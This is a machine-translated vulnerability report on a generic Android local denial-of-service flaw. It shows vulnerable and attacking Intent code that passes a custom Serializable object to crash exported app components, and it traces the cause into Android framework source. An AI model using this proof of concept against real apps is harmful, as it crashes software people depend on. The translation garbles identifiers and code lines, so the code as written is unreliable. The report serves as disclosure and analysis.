Android App General-purpose denial of service, vulnerability Analysis report

Reviews: Remember there was a time when a lot of SRC platform was brushed a large number of app local denial of service vulnerability, mobile security Team Love Beta (ineice.com) found an Android client generic denial of service vulnerability, to see their detailed analysis it.

0xr0ot and Xbalien A common local denial of service vulnerability was found when all of the exception types that could lead to the application denial of service were shared. This general-purpose local denial of service can result in a large area of app denial of service.

The denial of service for serialized objects is mainly due to the use of Getserializableextra () API in the application, because the application developer does not judge the incoming data, malicious applications can pass through malformed data, resulting in the application of local denial of service.

Vulnerability Application code snippet:

1 Intent i = getintent ();

2 if (I.getaction (). Equals ("Serializable_action")) {

3 I.getserializableextra ("Serializable_key"); No abnormal judgment.

4}

Attack application code Snippet:

1 Intent i = new Intent ();

2 i.setaction ("Serializable_action");

3 I.setclassname ("Com.exp.serializable", "com.exp.serializable.MainActivity");

4 I.putextra ("Seriadddddlizable_dkey", XXX); Here is the incoming malformed data

5 startactivity (i);

For example, XXX at the incoming biginteger.valueof (1) is very likely to be transformed abnormal error java.lang.ClassCastException.

But later the communication found that when passing in a custom serialized object serializable or Getparcelable object, the target component receiving intent was in Getserializableextra (), getparcelable () Class undefined exception Java.lang.NoClassDefFoundError will be thrown. This is because when you apply a serialized class object to a vulnerability that is not in the application itself, it must not be found in the context of the application.

The custom serialization class is simple:

1 public class Dataschema implements Serializable {

2 private static final long serialversionuid = -3601187837704976264l;

3 public Dataschema () {

4 super ();

5}

6}

The corresponding attack code in the XXX place in the new Dataschema (), we found that the incoming key regardless of whether the same as the vulnerability application, will throw the class undefined exception.

As the test progresses, we discover through Logcat that the error log is not necessarily caused by Getserializableextra (), getparcelable (). Then we stretched out and tried to pass in our custom serialized class object to Getxxxextra () and found that the class was thrown out of the undefined exception.

To test the app code snippet:

1 protected void OnCreate (Bundle savedinstancestate) {

2 Intent Intent = Getintent ();

3 Intent.getstringextra ("ROIS"); This will still be due to noclassdeffounderror crash

4}

We then tested a number of mainstream applications on the market, including bat. Found that this method can kill. We started to think that this was the problem with Android itself and began to turn over the source code.

Getstringextra public string (string name) {

Mextras return = = null? Null:mExtras.getString (name);

03}

04/frameworks/base/core/java/android/os/bundle.java

public string getString (string key) {

Unparcel (); Working with Data

07 ...

08}

*/* Package */synchronized void Unparcel () {

10 ...

Mparcelleddata.readmapinternal (MMap, N, Mclassloader);

12 ...

13}

-

15/frameworks/base/core/java/android/os/parcel.java

Readmapinternal parse the data passed in

Android App General-purpose denial of service, vulnerability Analysis report